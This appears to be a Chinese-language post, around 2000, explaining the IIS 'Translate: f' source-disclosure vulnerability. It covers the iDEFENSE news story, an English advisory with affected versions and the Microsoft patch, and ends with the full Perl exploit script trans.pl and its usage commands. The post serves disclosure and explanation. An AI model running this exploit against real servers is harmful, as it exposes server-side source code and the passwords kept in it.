最近各位可能都有看到一篇如下類似的報導︰

「攻擊程式網上曝光，可進入微軟伺服器」



根據CNET報導指出，一家捷克業者製作的網路安全檢查程式，可偵測出網路漏洞，進入

微軟IIS的伺服器裡面，取得使用者密碼等相關重要資料。根據 wired.com 報導，這家

捷克 iDEFENSE 資訊服務公司表示，原本提供的檢查程式是為了讓網管測試自己系統有

無漏洞，卻不料可以淪為駭客入侵的工具。 iDEFENSE 資訊服務公司指出，由於這項程

式公佈的太突然，微軟方面還來不及推出相關修補程式，所以導致可能會發生不少 IIS

伺服器被攻擊的事件.........



其實 iDEFENSE 公司所公佈的檢查程式，對於很多接觸駭客較久的網友都知道，那是一

種網站 scanner 安全檢查程式，可以檢查出該網站是否有存在已經知道的系統漏洞。

但是這次 iDEFENSE 提供檢查程式捅出漏子的原因，是因為它們的檢查程式裡面包

括了一個 IIS 新的系統漏洞，這個漏洞在微軟還未提供修補程式之前，就已經公佈在

網站上，所以導致有些駭客可能因此藉著這個漏洞入侵到別人的 IIS 網站裡面。



而 iDEFENSE 發生「凸錘」的漏洞，就是這個名為「Translate:f」的漏洞。



漏洞大綱︰

A vulnerability in IIS allows remote attackers to view the source of offered

server side scripts supported by IIS (such as ASP, ASA, HTR, etc.). This

vulnerability is very dangerous since a lot of sensitive information is kept

in these files, since programmers often rely on the fact that the source code

is hidden from the user.

The vulnerability involves sending a special header with 'Translate: f' at

the end of it, and then a trailing slash '/' appended to the end of the URL.

It cannot be exploited by the standard browsers, but an exploit code below

enables to test for this problem.



詳細內容︰



漏洞系統︰

Microsoft Windows NT 2000 (IIS 5.0)

Windows NT 4.0 with FrontPage Server Extensions 2000



免疫系統︰

Microsoft IIS 4.0 and below



WebDAV implemented in Windows 2000 and Office 2000 (including FrontPage 2000

and FrontPage 2000 Server extensions) is the source of Translate:f problem.



When someone makes request for ASP/ASA (or any other scriptable page) and

adds "Translate: f" into headers of HTTP GET request (headers are not part

of the URL, they are part of the raw HTTP request), there is a serious security

bug in Windows 2000 (when unpatched by SP1) that in return gives complete

ASP/ASA code instead of processed file. It's necessary to add a trailing

slash "/" to end of requested URL to make this work.



"Translate:f" is legitimate header for WebDAV, it is used as it should be -

adding this to HTTP GET is a signal for the WebDAV component to return the

source code of the requested file and bypass processing. It is used in

FrontPage2000 and any WebDAV compatible client to get a file for editing.

It has to be accompanied by some other information, which should prevent

unauthorized users from viewing the source. Unfortunately, a coding problem

makes it possible to retrieve those files by simply adding "Translate:f" in

the header, and placing "/" at end of request to the HTTP GET.



It is a Windows 2000 bug, but because of FrontPage Server Extensions 2000

can be installed even on IIS 4.0 sites, it also affectes IIS 4.0. Many

IIS 4.0 sites will exhibit the "Translate: f" bug when web files are stored

on a shared (network) directory, this vulnerability has been fixed in the

past (see our previous article: Patch Available for the Virtualized UNC

Share Vulnerability).



修正程式︰

Microsoft has released the following patch, which eliminates this vulnerability:



Microsoft patch Q256888_W2K_SP1_x86_en



漏洞攻擊程式原始碼︰

Typical usage:

$ perl trans.pl www.example.com login.asp 80



To use against SSL sites:

1) $ sslproxy -L 127.0.0.1 -l 7555 -R www.example.com -r 443 -v Class3.pem

2) $ perl trans.pl 127.0.0.1 login.asp 7555



---cut: trans.pl---

#!/usr/bin/perl

use Socket;



####test arguments

if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}

#####load values

$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];

#####build request

$xtosend=<<EOT

GET /$toget\\ HTTP/1.0

Host: $host

User-Agent: SensePostData

Content-Type: application/x-www-form-urlencoded

Translate: f



EOT

;

$xtosend=~s/\n/\r\n/g;

####send request

#print $xtosend;

my @results=sendraw($xtosend);

print @results;

#### Sendraw - thanx RFP rfp@wiretrip.net

sub sendraw { # this saves the whole transaction anyway

my ($pstr)=@_;

socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||

die("Socket problems\n");

if(connect(S,pack "SnA4x8",2,$port,$target)){

my @in;

select(S); $|=1; print $pstr;

while(<S>){ push @in, $_;

print STDOUT "." if(defined $args{X});}

select(STDOUT); close(S); return @in;

} else { die("Can't connect...\n"); }

}

---cut----

---